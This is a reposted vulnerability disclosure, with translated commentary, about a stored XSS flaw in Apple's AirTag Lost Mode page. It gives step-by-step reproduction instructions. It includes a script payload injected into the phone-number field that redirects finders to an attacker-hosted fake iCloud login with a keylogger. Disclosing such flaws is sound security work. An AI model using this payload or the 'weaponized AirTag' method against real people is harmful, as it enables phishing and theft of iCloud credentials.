By Bobbyr Medium :: A very cool topic in several respects at once | Zero-Day: Hijacking iCloud Credentials with Apple Airtags (Stored XSS)

 

First, another story about how Apple's bug bounty program has been crumpling, slowing down, and slowing down, for whatever reason, delaying the review process for a vulnerability that the developer found. This includes the fact that they can't tell if there will be a payout for the discovery, and the amount of it. So after 90 days have passed since the problem was discovered, the developer has published information about it. 

Secondly, the vulnerability itself is also pretty cool. The gist there is that there are AirTags, which, when lost and in the appropriate "lost" mode, open the Apple page to whoever finds it - found.Apple.com opens there. But the page embeds the contents of a field about the owner's phone number to notify him of it. But Apple forgot to embed verification of the phone number field when setting up the tag, and that's the crux of the vulnerability. A URL with XSS can be written into that field, and when you open found.Apple.com there, a fake iCloud login window will load in the page, as the developer gives an example - to collect logins to the service. It is clear that 2FA will protect most users, but automated password hijacking systems are already appearing for these mechanisms as well. Well, and other mechanisms of some kind of harm with a web page. In short, you scatter AirTags, then you collect something. Anyway, that sort of thing.

2 min

View Original

Bobbyr

Just now·2 min read

Apple’s “Lost Mode” allows a user to mark their Airtag as missing if they have misplaced it. This generates a unique https://found.apple.com page, which contains the Airtag’s serial number, and the phone number and personal message of the Airtag owner. If any iPhone or Android user happens to discover a missing Airtag, they can scan it (through NFC) with their device, which will open up the Airtag’s unique https://found.apple.com page on their device.

Screenshot by Jason Cipriani/CNET

An attacker can carry out Stored XSS on this https://found.apple.com page, by injecting a malicious payload into the Airtag “Lost Mode” phone number field. A victim will believe they are being asked to sign into iCloud so they can get in contact with the owner of the Airtag, when in fact, the attacker has redirected them to a credential hijacking page. Other XSS exploits can be carried out as well like session token hijacking, clickjacking, and more. An attacker can create weaponized Airtags, and leave them around, victimizing innocent people who are simply trying to help a person find their lost Airtag.

Reproduction Steps to create a weaponized Airtag:

1. An attacker sets their Airtag into lost mode.

2. An attacker intercepts this request, and injects this malicious payload into the phone number field:

<script>window.location=’https://10.0.1.137:8000/indexer.html’;var a = ‘’;</script>

This XSS code above will redirect a victim to the attacker’s fake iCloud page, which has a keylogger installed to capture their credentials.

3. A victim then discovers the lost Airtag. They open up their Find My app, and scan the Airtag.

4. This opens up the generated https://found.apple.com page. The victim is immediately redirected to the malicious attacker page, which is a direct clone of one of the iCloud.com login pages.

5. The victim enters their iCloud credentials, which are immediately exfiltrated to the attacker’s server.

The above walkthrough outlines only one example of the dangers of Stored XSS. There are countless ways an attacker could victimize an end user who discovers a lost Airtag. Since Airtags were recently released, most users would be unaware that accessing the https://found.apple.com page doesn’t require authentication at all.

 The https://found.apple.com link can also be used as a phishing link, and shared via a desktop/laptop, without the need for a mobile device to scan the Airtag. Further injection attacks could occur through the Find My App, which is used to scan third-party devices that support “Lost Mode” as part of Apple’s Find My network.

https://medium.com/@bobbyrsec/zero-day-hijacking-icloud-credentials-with-apple-airtags-stored-xss-6997da43a216